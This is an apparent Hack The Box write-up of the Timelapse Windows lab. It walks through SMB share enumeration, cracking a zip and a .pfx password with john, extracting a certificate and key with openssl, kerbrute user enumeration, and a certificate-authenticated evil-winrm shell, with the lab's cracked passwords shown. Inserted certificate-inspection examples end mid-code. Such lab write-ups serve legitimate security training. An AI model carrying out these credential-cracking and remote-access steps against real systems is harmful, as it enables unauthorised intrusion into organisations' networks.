Timelapse

This is a Windows machine from Hack The Box.

Nmap scan

┌──(kali㉿kali)-[~/HTB/timelapse]
└─$ nmap -sV -sC -oA cascade 10.10.11.152
Starting Nmap 7.94 ( https://nmap.org ) at 2023-09-14 08:17 EDT
Note: Host seems down. If it is really up, but blocking our ping probes, try -Pn
Nmap done: 1 IP address (0 hosts up) scanned in 3.22 seconds

┌──(kali㉿kali)-[~/HTB/timelapse]
└─$ nmap -sV -sC -oA cascade 10.10.11.152 -Pn
Starting Nmap 7.94 ( https://nmap.org ) at 2023-09-14 08:17 EDT
Nmap scan report for 10.10.11.152
Host is up (0.35s latency).
Not shown: 990 filtered tcp ports (no-response)
PORT     STATE SERVICE       VERSION
53/tcp   open  tcpwrapped
88/tcp   open  tcpwrapped
135/tcp  open  msrpc         Microsoft Windows RPC
139/tcp  open  tcpwrapped
389/tcp  open  tcpwrapped
445/tcp  open  microsoft-ds?
464/tcp  open  kpasswd5?
593/tcp  open  ncacn_http    Microsoft Windows RPC over HTTP 1.0
636/tcp  open  ldapssl?
3268/tcp open  ldap          Microsoft Windows Active Directory LDAP (Domain: timelapse.htb0., Site: Default-First-Site-Name)
Service Info: Host: DC01; OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
| smb2-security-mode: 
|   3:1:1: 
|_    Message signing enabled and required
|_clock-skew: 7h59m58s
| smb2-time: 
|   date: 2023-09-14T20:19:18
|_  start_date: N/A

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 159.74 seconds

Low-hanging fruit: port 445, and this is a domain controller.

└─$ crackmapexec smb 10.10.11.152 -u "" -p ""
SMB         10.10.11.152    445    DC01             [*] Windows 10.0 Build 17763 x64 (name:DC01) (domain:timelapse.htb) (signing:True) (SMBv1:False)

Domain is timelapse.htb

I add it to /etc/hosts:

127.0.0.1       localhost
127.0.1.1       kali
::1             localhost ip6-localhost ip6-loopback
ff02::1         ip6-allnodes
ff02::2         ip6-allrouters
10.10.10.175    EGOTISTICAL-BANK.LOCAL
10.10.10.100    active.htb  htb
10.10.10.161    htb.local
10.10.10.192    blackfield.local
10.10.10.182    cascade.local
10.10.11.152    timelapse.htb

Using ldapsearch, but we get nothing useful: an anonymous bind returns the naming contexts, but searching for users requires a successful bind.

kali@kali ~/H/timelapse> ldapsearch -x -H ldap://10.10.11.152 -s base namingcontexts
# extended LDIF
#
# LDAPv3
# base <> (default) with scope baseObject
# filter: (objectclass=*)
# requesting: namingcontexts 
#

#
dn:
namingcontexts: DC=timelapse,DC=htb
namingcontexts: CN=Configuration,DC=timelapse,DC=htb
namingcontexts: CN=Schema,CN=Configuration,DC=timelapse,DC=htb
namingcontexts: DC=DomainDnsZones,DC=timelapse,DC=htb
namingcontexts: DC=ForestDnsZones,DC=timelapse,DC=htb

# search result
search: 2
result: 0 Success

# numResponses: 2
# numEntries: 1
kali@kali ~/H/timelapse> ldapsearch -x -H ldap://10.10.11.152 -b 'DC=timelapse,DC=htb' -s sub '(objectClass=person)' sAMAccountName | grep 'sAMAccountName:' | awk -F ': ' '{print $2}'
kali@kali ~/H/timelapse> ldapsearch -x -H ldap://10.10.11.152 -b 'DC=timelapse,DC=htb' -s sub 
# extended LDIF
#
# LDAPv3
# base <DC=timelapse,DC=htb> with scope subtree
# filter: (objectclass=*)
# requesting: ALL
#

# search result
search: 2
result: 1 Operations error
text: 000004DC: LdapErr: DSID-0C090A5C, comment: In order to perform this opera
 tion a successful bind must be completed on the connection., data 0, v4563

# numResponses: 1
kali@kali ~/H/timelapse [1]> 

Trying anonymous rpcclient:

kali@kali ~/H/timelapse> rpcclient 10.10.11.152 -U ''
Password for [WORKGROUP\]:
rpcclient $> ls
command not found: ls
rpcclient $> enumdomusers
result was NT_STATUS_ACCESS_DENIED
rpcclient $> netshareenum
result was WERR_ACCESS_DENIED
rpcclient $> 

Tried unauthenticated GetNPUsers.py. No luck:

Impacket v0.11.0 - Copyright 2023 Fortra

[-] Error in searchRequest -> operationsError: 000004DC: LdapErr: DSID-0C090A5C, comment: In order to perform this operation a successful bind must be completed on the connection., data 0, v4563
kali@kali /u/s/d/p/examples> 


Listing shares anonymously with smbclient:

kali@kali /u/s/d/p/examples> smbclient -L //10.10.11.152
Password for [WORKGROUP\kali]:

        Sharename       Type      Comment
        ---------       ----      -------
        ADMIN$          Disk      Remote Admin
        C$              Disk      Default share
        IPC$            IPC       Remote IPC
        NETLOGON        Disk      Logon server share 
        Shares          Disk      
        SYSVOL          Disk      Logon server share 
Reconnecting with SMB1 for workgroup listing.
do_connect: Connection to 10.10.11.152 failed (Error NT_STATUS_RESOURCE_NAME_NOT_FOUND)
Unable to connect with SMB1 -- no workgroup available
kali@kali /u/s/d/p/examples> 

There is a share called Shares. We try to access it anonymously:

kali@kali /u/s/d/p/examples> smbclient //10.10.11.152/shares -U ""%""
tree connect failed: NT_STATUS_ACCESS_DENIED
kali@kali /u/s/d/p/examples [1]> 

Tried enum4linux:

Starting enum4linux v0.9.1 ( http://labs.portcullis.co.uk/application/enum4linux/ ) on Thu Sep 14 08:45:06 2023

 =========================================( Target Information )=========================================

Target ........... 10.10.11.152
RID Range ........ 500-550,1000-1050
Username ......... ''
Password ......... ''
Known Usernames .. administrator, guest, krbtgt, domain admins, root, bin, none


 ============================( Enumerating Workgroup/Domain on 10.10.11.152 )============================


[E] Can't find workgroup/domain



 ===================================( Session Check on 10.10.11.152 )===================================


[+] Server 10.10.11.152 allows sessions using username '', password ''


 ================================( Getting domain SID for 10.10.11.152 )================================

Domain Name: TIMELAPSE
Domain Sid: S-1-5-21-671920749-559770252-3318990721

[+] Host is part of a domain (not a workgroup)


 =================================( Share Enumeration on 10.10.11.152 )=================================

do_connect: Connection to 10.10.11.152 failed (Error NT_STATUS_RESOURCE_NAME_NOT_FOUND)

        Sharename       Type      Comment
        ---------       ----      -------
Reconnecting with SMB1 for workgroup listing.
Unable to connect with SMB1 -- no workgroup available

[+] Attempting to map shares on 10.10.11.152

enum4linux complete on Thu Sep 14 08:45:31 2023

kali@kali /u/s/d/p/examples> 

Connecting to the Shares share anonymously:

┌──(kali㉿kali)-[~/HTB/timelapse]
└─$ smbclient \\\\10.10.11.152\\shares -U ''
Password for [WORKGROUP\]:
Try "help" to get a list of possible commands.
smb: \> ls
  .                                   D        0  Mon Oct 25 11:39:15 2021
  ..                                  D        0  Mon Oct 25 11:39:15 2021
  Dev                                 D        0  Mon Oct 25 15:40:06 2021
  HelpDesk                            D        0  Mon Oct 25 11:48:42 2021

                6367231 blocks of size 4096. 1295497 blocks available
smb: \> cd dev
smb: \dev\> ls
  .                                   D        0  Mon Oct 25 15:40:06 2021
  ..                                  D        0  Mon Oct 25 15:40:06 2021
  winrm_backup.zip                    A     2611  Mon Oct 25 11:46:42 2021

                6367231 blocks of size 4096. 1294828 blocks available
smb: \dev\> get winrm_backup.zip
getting file \dev\winrm_backup.zip of size 2611 as winrm_backup.zip (1.5 KiloBytes/sec) (average 1.5 KiloBytes/sec)
smb: \dev\> cd ../
smb: \> ls
  .                                   D        0  Mon Oct 25 11:39:15 2021
  ..                                  D        0  Mon Oct 25 11:39:15 2021
  Dev                                 D        0  Mon Oct 25 15:40:06 2021
  HelpDesk                            D        0  Mon Oct 25 11:48:42 2021
                6367231 blocks of size 4096. 1293430 blocks available
smb: \> cd Helpdesk
smb: \Helpdesk\> ls
  .                                   D        0  Mon Oct 25 11:48:42 2021
  ..                                  D        0  Mon Oct 25 11:48:42 2021
  LAPS.x64.msi                        A  1118208  Mon Oct 25 10:57:50 2021
  LAPS_Datasheet.docx                 A   104422  Mon Oct 25 10:57:46 2021
  LAPS_OperationsGuide.docx           A   641378  Mon Oct 25 10:57:40 2021
  LAPS_TechnicalSpecification.docx      A    72683  Mon Oct 25 10:57:44 2021

                6367231 blocks of size 4096. 1292493 blocks available
smb: \Helpdesk\> get *.*
NT_STATUS_OBJECT_NAME_INVALID opening remote file \Helpdesk\*.*
smb: \Helpdesk\> get LAPS.x64.msi

parallel_read returned NT_STATUS_IO_TIMEOUT

^C

┌──(kali㉿kali)-[~/HTB/timelapse]
└─$ smbclient \\\\10.10.11.152\\shares -U ''
Password for [WORKGROUP\]:
Try "help" to get a list of possible commands.
smb: \> cd HelpDesk\
smb: \HelpDesk\> ls
  .                                   D        0  Mon Oct 25 11:48:42 2021
  ..                                  D        0  Mon Oct 25 11:48:42 2021
  LAPS.x64.msi                        A  1118208  Mon Oct 25 10:57:50 2021
  LAPS_Datasheet.docx                 A   104422  Mon Oct 25 10:57:46 2021
  LAPS_OperationsGuide.docx           A   641378  Mon Oct 25 10:57:40 2021
  LAPS_TechnicalSpecification.docx      A    72683  Mon Oct 25 10:57:44 2021
                6367231 blocks of size 4096. 1287503 blocks available
smb: \HelpDesk\> get LAPS_Datasheet.docx
getting file \HelpDesk\LAPS_Datasheet.docx of size 104422 as LAPS_Datasheet.docx (25.5 KiloBytes/sec) (average 25.5 KiloBytes/sec)
smb: \HelpDesk\> get LAPS_OperationsGuide.docx
getting file \HelpDesk\LAPS_OperationsGuide.docx of size 641378 as LAPS_OperationsGuide.docx (215.3 KiloBytes/sec) (average 105.5 KiloBytes/sec)
smb: \HelpDesk\> get LAPS_TechnicalSpecification.docx
getting file \HelpDesk\LAPS_TechnicalSpecification.docx of size 72683 as LAPS_TechnicalSpecification.docx (36.6 KiloBytes/sec) (average 90.4 KiloBytes/sec)
smb: \HelpDesk\> get LAPS.x64.msi
getting file \HelpDesk\LAPS.x64.msi of size 1118208 as LAPS.x64.msi (323.6 KiloBytes/sec) (average 154.8 KiloBytes/sec)
smb: \HelpDesk\> 

We download all the files locally.

We will first check the docs. ChatGPT says that to read the docs we need to install libreoffice-writer:

sudo apt update
sudo apt install libreoffice-writer

Once installed: libreoffice --writer LAPS_Datasheet.docx

After installing:

┌──(kali㉿kali)-[~/HTB/timelapse]
└─$ dpkg -l | grep libreoffice-writer

ii  libreoffice-writer                             4:7.5.5-4                             amd64        office productivity suite -- word processor

We find that the document was prepared by a "Jiri Formacek", but this is a Microsoft employee. We'll get back to this document later.

Cannot open the zip file; it seems password protected:

┌──(kali㉿kali)-[~/HTB/timelapse]
└─$ unzip winrm_backup.zip 
Archive:  winrm_backup.zip
[winrm_backup.zip] legacyy_dev_auth.pfx password: 
   skipping: legacyy_dev_auth.pfx    incorrect password

I am going to try and see whether users dev and helpdesk exist:

└─$ cat users.txt          
dev
helpdesk
administrator

Using kerbrute: they don't exist (only administrator comes back as valid).

┌──(kali㉿kali)-[~/HTB/timelapse]
└─$ ./kerbrute userenum --dc 10.10.11.152 -d  timelapse.HTB users.txt

    __             __               __     
   / /_____  _____/ /_  _______  __/ /____ 
  / //_/ _ \/ ___/ __ \/ ___/ / / / __/ _ \
 / ,< /  __/ /  / /_/ / /  / /_/ / /_/  __/
/_/|_|\___/_/  /_.___/_/   \__,_/\__/\___/                                        

Version: v1.0.3 (9dad6e1) - 09/14/23 - Ronnie Flathers @ropnop

2023/09/14 09:14:04 >  Using KDC(s):
2023/09/14 09:14:04 >   10.10.11.152:88

2023/09/14 09:14:04 >  [+] VALID USERNAME:       administrator@timelapse.htb
2023/09/14 09:14:04 >  Done! Tested 3 usernames (1 valid) in 0.412 seconds

Asked ChatGPT how to read the MSI:

sudo apt install msitools
msiextract -C outdir/ LAPS.x64.msi

Ran the above; the files were extracted into the current directory:

└─$ msiextract LAPS.x64.msi outdir/

PolicyDefinitions/en-US/AdmPwd.adml
PolicyDefinitions/AdmPwd.admx
LAPS/AdmPwd.UI.exe
WindowsPowershell/v1.0/Modules/AdmPwd.PS/AdmPwd.Utils.dll
LAPS/AdmPwd.Utils.dll
LAPS/CSE/AdmPwd.dll
WindowsPowershell/v1.0/Modules/AdmPwd.PS/AdmPwd.PS.dll
WindowsPowershell/v1.0/Modules/AdmPwd.PS/AdmPwd.PS.psd1
WindowsPowershell/v1.0/Modules/AdmPwd.PS/AdmPwd.PS.format.ps1xml
WindowsPowershell/v1.0/Modules/AdmPwd.PS/en-US/AdmPwd.PS.dll-Help.xml

┌──(kali㉿kali)-[~/HTB/timelapse]
└─$ ls
cascade.gnmap  kerbrute             LAPS_OperationsGuide.docx         PolicyDefinitions  winrm_backup.zip
cascade.nmap   LAPS                 LAPS_TechnicalSpecification.docx  users.txt
cascade.xml    LAPS_Datasheet.docx  LAPS.x64.msi                      WindowsPowershell

┌──(kali㉿kali)-[~/HTB/timelapse]
└─$ cd LAPS

┌──(kali㉿kali)-[~/HTB/timelapse/LAPS]
└─$ ls
AdmPwd.UI.exe  AdmPwd.Utils.dll  CSE

┌──(kali㉿kali)-[~/HTB/timelapse/LAPS]
└─$ cd CSE

┌──(kali㉿kali)-[~/HTB/timelapse/LAPS/CSE]
└─$ ls
AdmPwd.dll

┌──(kali㉿kali)-[~/HTB/timelapse/LAPS/CSE]
└─$ cd ../

┌──(kali㉿kali)-[~/HTB/timelapse/LAPS]
└─$ ls
AdmPwd.UI.exe  AdmPwd.Utils.dll  CSE

┌──(kali㉿kali)-[~/HTB/timelapse/LAPS]
└─$ cd ../

┌──(kali㉿kali)-[~/HTB/timelapse]
└─$ ls
cascade.gnmap  kerbrute             LAPS_OperationsGuide.docx         PolicyDefinitions  winrm_backup.zip
cascade.nmap   LAPS                 LAPS_TechnicalSpecification.docx  users.txt
cascade.xml    LAPS_Datasheet.docx  LAPS.x64.msi                      WindowsPowershell

┌──(kali㉿kali)-[~/HTB/timelapse]
└─$ cd WindowsPowershell

┌──(kali㉿kali)-[~/HTB/timelapse/WindowsPowershell]
└─$ ls
v1.0

┌──(kali㉿kali)-[~/HTB/timelapse/WindowsPowershell]
└─$ cd v1.0

┌──(kali㉿kali)-[~/HTB/timelapse/WindowsPowershell/v1.0]
└─$ ls
Modules

┌──(kali㉿kali)-[~/HTB/timelapse/WindowsPowershell/v1.0]
└─$ cd Modules

┌──(kali㉿kali)-[~/…/timelapse/WindowsPowershell/v1.0/Modules]
└─$ ls
AdmPwd.PS

I am a bit stuck, so I will go back to the zip file and see if we can brute force it with john,

following these steps from ChatGPT:

zip2john winrm_backup.zip > winrm_backup.hash

john winrm_backup.hash

john --show winrm_backup.hash

Found the password: supremelegacy

┌──(kali㉿kali)-[~/HTB/timelapse]
└─$ zip2john winrm_backup.zip > winrm_backup.hash
Created directory: /home/kali/.john
ver 2.0 efh 5455 efh 7875 winrm_backup.zip/legacyy_dev_auth.pfx PKZIP Encr: TS_chk, cmplen=2405, decmplen=2555, crc=12EC5683 ts=72AA cs=72aa type=8

┌──(kali㉿kali)-[~/HTB/timelapse]
└─$ ls
cascade.gnmap  kerbrute             LAPS_OperationsGuide.docx         PolicyDefinitions  winrm_backup.hash
cascade.nmap   LAPS                 LAPS_TechnicalSpecification.docx  users.txt          winrm_backup.zip
cascade.xml    LAPS_Datasheet.docx  LAPS.x64.msi                      WindowsPowershell

┌──(kali㉿kali)-[~/HTB/timelapse]
└─$ john winrm_backup.hash
Using default input encoding: UTF-8
Loaded 1 password hash (PKZIP [32/64])
Will run 4 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
supremelegacy    (winrm_backup.zip/legacyy_dev_auth.pfx)     
1g 0:00:00:00 DONE (2023-09-14 09:50) 1.923g/s 6679Kp/s 6679Kc/s 6679KC/s surkerior..superkebab
Use the "--show" option to display all of the cracked passwords reliably

Unzipping the file:

ing: legacyy_dev_auth.pfx    

┌──(kali㉿kali)-[~/HTB/timelapse]
└─$ ls                        
cascade.gnmap  kerbrute             LAPS_OperationsGuide.docx         legacyy_dev_auth.pfx  WindowsPowershell
cascade.nmap   LAPS                 LAPS_TechnicalSpecification.docx  PolicyDefinitions     winrm_backup.hash
cascade.xml    LAPS_Datasheet.docx  LAPS.x64.msi                      users.txt             winrm_backup.zip
                                                                                                                     
┌──(kali㉿kali)-[~/HTB/timelapse]
└─$ cat legacyy_dev_auth.pfx

Found the file: legacyy_dev_auth.pfx

From ChatGPT:

The `.pfx` file is a PKCS#12 archive, which usually contains both a private key and its corresponding X.509 digital certificate. You can use `openssl` to manage and read these files.

To extract the private key from the `.pfx` file:  openssl pkcs12 -in legacyy_dev_auth.pfx -nocerts -out privatekey.pem
To extract the certificate from the `.pfx` file: openssl pkcs12 -in legacyy_dev_auth.pfx -clcerts -nokeys -out certificate.crt

We try the above, but the password does not work:

└─$ openssl pkcs12 -in legacyy_dev_auth.pfx -nocerts -out privatekey.pem
Enter Import Password:
Mac verify error: invalid password?

┌──(kali㉿kali)-[~/HTB/timelapse]
└─$ openssl pkcs12 -in legacyy_dev_auth.pfx -clcerts -nokeys -out certificate.crt
Enter Import Password:
Mac verify error: invalid password?

We are going to try and brute-force the password.

ChatGPT suggests we use pfx2john.py, which we install via:

git clone https://github.com/magnumripper/JohnTheRipper.git

cd JohnTheRipper/src
./configure && make

Then we run the command inside the run folder to brute-force:

┌──(kali㉿kali)-[~/HTB/timelapse/JohnTheRipper/run]
└─$ ./pfx2john.py ~/HTB/timelapse/legacyy_dev_auth.pfx > pfx.hash

┌──(kali㉿kali)-[~/HTB/timelapse/JohnTheRipper/run]
└─$ john pfx.hash --wordlist=/usr/share/wordlists/rockyou.txt

Using default input encoding: UTF-8
Loaded 1 password hash (pfx, (.pfx, .p12) [PKCS#12 PBE (SHA1/SHA2) 128/128 AVX 4x])
Cost 1 (iteration count) is 2000 for all loaded hashes
Cost 2 (mac-type [1:SHA1 224:SHA224 256:SHA256 384:SHA384 512:SHA512]) is 1 for all loaded hashes
Will run 4 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
thuglegacy       (legacyy_dev_auth.pfx)     
1g 0:00:02:58 DONE (2023-09-14 10:09) 0.005616g/s 18148p/s 18148c/s 18148C/s thuglife06..thug211
Use the "--show" option to display all of the cracked passwords reliably
Session completed.

The password is thuglegacy.

We run the two commands again:

└─$ openssl pkcs12 -in legacyy_dev_auth.pfx -out legacyy_dev_auth.pem

Enter Import Password:
Enter PEM pass phrase:
Verifying - Enter PEM pass phrase:

┌──(kali㉿kali)-[~/HTB/timelapse]
└─$ openssl pkcs12 -in legacyy_dev_auth.pfx -clcerts -nokeys -out certificate.crt
Enter Import Password:

┌──(kali㉿kali)-[~/HTB/timelapse]
└─$ ls
cascade.gnmap    kerbrute                          LAPS.x64.msi          privatekey.pem     winrm_backup.zip
cascade.nmap     LAPS                              legacyy_dev_auth.pem  temp.pem
cascade.xml      LAPS_Datasheet.docx               legacyy_dev_auth.pfx  users.txt
certificate.crt  LAPS_OperationsGuide.docx         pfx.hash              WindowsPowershell
JohnTheRipper    LAPS_TechnicalSpecification.docx  PolicyDefinitions     winrm_backup.hash

┌──(kali㉿kali)-[~/HTB/timelapse]
└─$ cat certificate.crt     
Bag Attributes
    localKeyID: 01 00 00 00 
subject=CN = Legacyy
issuer=CN = Legacyy
-----BEGIN CERTIFICATE-----
(certificate body omitted)
-----END CERTIFICATE-----

┌──(kali㉿kali)-[~/HTB/timelapse]
└─$ cat privatekey.pem 

Viewing the cert. Again, advice from ChatGPT: openssl x509 -in certificate.crt -text -noout

┌──(kali㉿kali)-[~/HTB/timelapse]
└─$ openssl x509 -in certificate.crt -text -noout

Certificate:
    Data:
        Version: 3 (0x2)
        Serial Number:
            1d:99:89:29:8a:cf:11:bb:41:93:a1:cf:f4:4e:12:df
        Signature Algorithm: sha256WithRSAEncryption
        Issuer: CN = Legacyy
        Validity
            Not Before: Oct 25 14:05:52 2021 GMT
            Not After : Oct 25 14:15:52 2031 GMT
        Subject: CN = Legacyy
        Subject Public Key Info:
            Public Key Algorithm: rsaEncryption
                Public-Key: (2048 bit)
                Modulus:
                Exponent: 65537 (0x10001)
        X509v3 extensions:
            X509v3 Key Usage: critical
                Digital Signature, Key Encipherment
            X509v3 Extended Key Usage: 
                TLS Web Client Authentication
            X509v3 Subject Alternative Name: 
                othername: UPN::[email protected]
            X509v3 Subject Key Identifier: 
                CC:D9:0E:E4:AF:20:9E:B0:75:2B:FD:81:96:1E:AC:2D:B1:25:58:19
    Signature Algorithm: sha256WithRSAEncryption
    Signature Value:

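Added example (not code from the original post or from the machine): the openssl steps above open the PKCS#12 archive and read the certificate's SAN; this script does the same with the Python `cryptography` library, so a reviewer can check what a recovered .pfx actually asserts (subject, UPN, Client Authentication EKU, and whether the private key is inside). The archive is constructed in the script to mirror the shape of legacyy_dev_auth.pfx (self-signed CN=Legacyy, UPN SAN); the password is made up, and a wrong password fails the MAC check exactly as the "Mac verify error" seen above.

```python
# Added example for this writeup (not the original post's code). Needs the
# `cryptography` package. The archive built here is constructed to mirror
# legacyy_dev_auth.pfx: self-signed CN=Legacyy, UPN SAN, Client Auth EKU.
import datetime

from cryptography import x509
from cryptography.hazmat.primitives import hashes, serialization
from cryptography.hazmat.primitives.asymmetric import rsa
from cryptography.hazmat.primitives.serialization import pkcs12
from cryptography.x509.oid import ExtendedKeyUsageOID, NameOID

# Microsoft's OID for the User Principal Name otherName inside a SAN; this is
# what openssl prints as "othername: UPN::<user>@<domain>".
UPN_OID = x509.ObjectIdentifier("1.3.6.1.4.1.311.20.2.3")


def encode_der_utf8string(text: str) -> bytes:
    """DER-encode a short UTF8String (tag 0x0C, short-form length < 128)."""
    raw = text.encode("utf-8")
    if len(raw) >= 128:
        raise ValueError("too long for short-form DER length")
    return bytes([0x0C, len(raw)]) + raw


def decode_der_utf8string(der: bytes) -> str:
    """Reverse of encode_der_utf8string; rejects anything else."""
    if len(der) < 2 or der[0] != 0x0C or der[1] >= 128 or len(der) != 2 + der[1]:
        raise ValueError("not a short-form DER UTF8String")
    return der[2:].decode("utf-8")


def build_pfx(upn: str, common_name: str, password: bytes) -> bytes:
    """Construct a self-signed client-auth cert plus key, wrapped as PKCS#12."""
    key = rsa.generate_private_key(public_exponent=65537, key_size=2048)
    name = x509.Name([x509.NameAttribute(NameOID.COMMON_NAME, common_name)])
    now = datetime.datetime.now(datetime.timezone.utc)
    key_usage = x509.KeyUsage(
        digital_signature=True, key_encipherment=True, content_commitment=False,
        data_encipherment=False, key_agreement=False, key_cert_sign=False,
        crl_sign=False, encipher_only=False, decipher_only=False,
    )
    san = x509.SubjectAlternativeName(
        [x509.OtherName(UPN_OID, encode_der_utf8string(upn))]
    )
    cert = (
        x509.CertificateBuilder()
        .subject_name(name)
        .issuer_name(name)  # self-signed, like the writeup's cert
        .public_key(key.public_key())
        .serial_number(x509.random_serial_number())
        .not_valid_before(now)
        .not_valid_after(now + datetime.timedelta(days=3650))
        .add_extension(key_usage, critical=True)
        .add_extension(x509.ExtendedKeyUsage([ExtendedKeyUsageOID.CLIENT_AUTH]),
                       critical=False)
        .add_extension(san, critical=False)
        .sign(key, hashes.SHA256())
    )
    return pkcs12.serialize_key_and_certificates(
        name=b"legacyy_dev_auth", key=key, cert=cert, cas=None,
        encryption_algorithm=serialization.BestAvailableEncryption(password),
    )


def inspect_pfx(pfx_bytes: bytes, password: bytes):
    """Report what the archive asserts, or None when the password is wrong
    (a failed PKCS#12 MAC check, openssl's "Mac verify error")."""
    try:
        key, cert, _chain = pkcs12.load_key_and_certificates(pfx_bytes, password)
    except ValueError:
        return None
    upns = []
    try:
        san = cert.extensions.get_extension_for_class(x509.SubjectAlternativeName)
        for other in san.value.get_values_for_type(x509.OtherName):
            if other.type_id == UPN_OID:
                upns.append(decode_der_utf8string(other.value))
    except x509.ExtensionNotFound:
        pass
    try:
        eku = cert.extensions.get_extension_for_class(x509.ExtendedKeyUsage).value
        client_auth = ExtendedKeyUsageOID.CLIENT_AUTH in eku
    except x509.ExtensionNotFound:
        client_auth = False
    return {
        "subject": cert.subject.rfc4514_string(),
        "upns": upns,                        # identities the cert asserts
        "client_auth": client_auth,          # usable for client logon (WinRM etc.)
        "has_private_key": key is not None,  # a full credential, not just a cert
    }


if __name__ == "__main__":
    # Constructed sample: UPN/CN mirror the writeup's cert, password is made up.
    sample = build_pfx("legacyy@timelapse.htb", "Legacyy", b"example-password")
    print(inspect_pfx(sample, b"wrong-password"))  # None: MAC check fails
    print(inspect_pfx(sample, b"example-password"))
```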
I see a user legacyy@timelapse.htb.

Using kerbrute to check whether it's valid, and it is:

┌──(kali㉿kali)-[~/HTB/timelapse]
└─$ nano users.txt

┌──(kali㉿kali)-[~/HTB/timelapse]
└─$ ./kerbrute userenum --dc 10.10.11.152 -d  timelapse.HTB users.txt

    __             __               __     
   / /_____  _____/ /_  _______  __/ /____ 
  / //_/ _ \/ ___/ __ \/ ___/ / / / __/ _ \
 / ,< /  __/ /  / /_/ / /  / /_/ / /_/  __/
/_/|_|\___/_/  /_.___/_/   \__,_/\__/\___/                                        

Version: v1.0.3 (9dad6e1) - 09/14/23 - Ronnie Flathers @ropnop

2023/09/14 10:20:03 >  Using KDC(s):
2023/09/14 10:20:03 >   10.10.11.152:88

2023/09/14 10:20:03 >  [+] VALID USERNAME:       [email protected]
2023/09/14 10:20:03 >  [+] VALID USERNAME:       [email protected]
2023/09/14 10:20:03 >  Done! Tested 4 usernames (2 valid) in 0.349 seconds

We try GetNPUsers, but no luck getting a hash:

┌──(kali㉿kali)-[/usr/share/doc/python3-impacket/examples]
└─$ ./GetNPUsers.py timelapse.HTB/legacyy                         
Impacket v0.11.0 - Copyright 2023 Fortra

Password:
[*] Cannot authenticate legacyy, getting its TGT
[-] User legacyy doesn't have UF_DONT_REQUIRE_PREAUTH set

ChatGPT suggests that we can authenticate with the cert and PEM key. Interesting:

evil-winrm -i [TARGET_IP] -u [USERNAME] -c /path/to/certificate.crt -k /path/to/privatekey.pem

Tried the command, but it failed:

┌──(kali㉿kali)-[/usr/share/doc/python3-impacket/examples]
└─$ evil-winrm -i 10.10.11.152 -u legaccy -c /home/kali/HTB/timelapse/certificate.crt -k /home/kali/HTB/timelapse/privatekey.pem 

/usr/share/rubygems-integration/all/gems/winrm-2.3.6/lib/winrm/connection_opts.rb:72:in `validate_required_fields': password is a required option (RuntimeError)
        from /usr/share/rubygems-integration/all/gems/winrm-2.3.6/lib/winrm/connection_opts.rb:59:in `validate'
        from /usr/share/rubygems-integration/all/gems/winrm-2.3.6/lib/winrm/connection_opts.rb:31:in `create_with_defaults'
        from /usr/share/rubygems-integration/all/gems/winrm-2.3.6/lib/winrm/connection.rb:64:in `configure_connection_opts'
        from /usr/share/rubygems-integration/all/gems/winrm-2.3.6/lib/winrm/connection.rb:27:in `initialize'
        from /usr/share/rubygems-integration/all/gems/evil-winrm-3.5/bin/evil-winrm:314:in `new'
        from /usr/share/rubygems-integration/all/gems/evil-winrm-3.5/bin/evil-winrm:314:in `connection_initialization'
        from /usr/share/rubygems-integration/all/gems/evil-winrm-3.5/bin/evil-winrm:496:in `main'
        from /usr/share/rubygems-integration/all/gems/evil-winrm-3.5/bin/evil-winrm:1029:in `<top (required)>'
        from /usr/bin/evil-winrm:25:in `load'
        from /usr/bin/evil-winrm:25:in `<main>'

┌──(kali㉿kali)-[/usr/share/doc/python3-impacket/examples]
└─$ evil-winrm -i 10.10.11.152 -u legaccy -p "dummy" -c /home/kali/HTB/timelapse/certificate.crt -k /home/kali/HTB/timelapse/privatekey.pem

                                        
Evil-WinRM shell v3.5
                                        
Warning: Remote path completions is disabled due to ruby limitation: quoting_detection_proc() function is unimplemented on this machine
                                        
Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion
                                        
Warning: Useless cert/s provided, SSL is not enabled
                                        
Info: Establishing connection to remote endpoint
^C
                                        
Warning: Press "y" to exit, press any other key to continue
                                        
Info: Exiting...

After looking online it turns out that -S is needed: certificate authentication only works over WinRM's HTTPS listener (port 5986). Without -S evil-winrm talks plain HTTP on 5985 and ignores the certificate (hence the "Useless cert/s provided, SSL is not enabled" warning above), and the first attempt simply hangs. So we use the initial command with -S:

evil-winrm -S -i 10.10.11.152 -u legaccy -c /home/kali/HTB/timelapse/certificate.crt -k /home/kali/HTB/timelapse/privatekey.pem

┌──(kali㉿kali)-[/usr/share/doc/python3-impacket/examples]
└─$ evil-winrm -S -i 10.10.11.152 -u legaccy -c /home/kali/HTB/timelapse/certificate.crt -k /home/kali/HTB/timelapse/privatekey.pem       
                                        
Evil-WinRM shell v3.5
                                        
Warning: Remote path completions is disabled due to ruby limitation: quoting_detection_proc() function is unimplemented on this machine
                                        
Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion
                                        
Warning: SSL enabled
                                        
Info: Establishing connection to remote endpoint
Enter PEM pass phrase:
*Evil-WinRM* PS C:\Users\legacyy\Documents> 


And we are in! Two things worth noting. The username passed to -u is misspelled (legaccy), yet the shell lands in C:\Users\legacyy: with certificate authentication the server's WinRM certificate mapping decides which account the certificate represents, so -u is not what authenticates us. And the private key is passphrase-protected, which is why "Enter PEM pass phrase:" is prompted here and again before later commands (decrypting the key once with openssl avoids the repeated prompt).
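As an added example (not part of the original writeup), the PowerShell below inspects a client certificate the way the server's WinRM certificate mapping does: the Client Authentication EKU and the UPN in the Subject Alternative Name are what get matched (together with the issuer) to an account, which is why the misspelled -u value above did not matter. It builds a throwaway self-signed certificate so it runs on any Windows host; the UPN legacyy@timelapse.htb, the file name and the function name are assumptions, and Get-WinRmClientCertInfo can be pointed at the real certificate.crt instead.

```powershell
# Added example, not from the original writeup.
# Inspect a WinRM client certificate: the Client Authentication EKU and the UPN
# in the SAN are what the server's certificate mapping matches to an account.

function Get-WinRmClientCertInfo {
    param([Parameter(Mandatory)][string]$CertPath)

    $cert = New-Object System.Security.Cryptography.X509Certificates.X509Certificate2 -ArgumentList $CertPath

    # 2.5.29.37 = Extended Key Usage; WinRM requires Client Authentication (1.3.6.1.5.5.7.3.2)
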